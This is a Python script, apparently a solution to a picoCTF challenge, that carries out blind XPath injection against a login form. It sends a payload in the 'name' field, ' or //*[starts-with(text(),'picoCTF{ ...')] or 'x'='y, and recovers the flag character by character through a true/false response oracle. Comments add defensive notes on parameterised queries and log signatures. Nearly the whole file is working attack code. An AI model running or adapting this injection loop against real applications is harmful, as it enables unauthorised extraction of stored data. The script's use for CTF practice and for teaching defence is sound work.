import requests
import string
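# Blind XPath injection solver for a picoCTF login form.
#
# The `name` field carries a predicate that is true only when some node in the
# XML document (//*) has text starting with the prefix recovered so far. The
# response body is the true/false oracle: it contains successSubstring when the
# predicate matched. Example of a single probe:
#examplePostRequest = requests.post('http://mercury.picoctf.net:53735', data = {"name":"' or //*[starts-with(text(),'picoCTF{')] or 'x'='y", "pass":"notRealPass"})
#
# Defender's view: this only works if the application builds its XPath query by
# concatenating the submitted field (presumably the case here; the server code
# is not shown). Binding user input as an XPath variable, or rejecting quotes
# and brackets in the field, closes the hole. In request logs the run appears
# as a burst of POSTs whose `name` values differ by a single trailing character
# inside a starts-with() predicate.

targetUrl = 'http://mercury.picoctf.net:53735'  # one place for the challenge endpoint
alphabet = string.printable  # digits, ASCII letters, punctuation and whitespace
successSubstring = "You're on the right path."  # marker the page returns on a true predicate
exploitedStart = "' or //*[starts-with(text(),'picoCTF{"  # grows by one character per hit
exploitedEnd = "')] or 'x'='y"

# Fixed upper bound of 20 positions. A round in which no candidate matches
# leaves exploitedStart unchanged, so the next round repeats the same probes.
for i in range(0, 20):
    for char in alphabet:
        exploitedString = exploitedStart + char + exploitedEnd
        httpReq = requests.post(targetUrl, data={"name": exploitedString, "pass": "noRealPass"})
        if successSubstring in httpReq.text:
            # Predicate was true: keep the character and move to the next position.
            exploitedStart += char
            print(exploitedStart + " succeded")
            break
        else:
            print(exploitedStart + char + " failed")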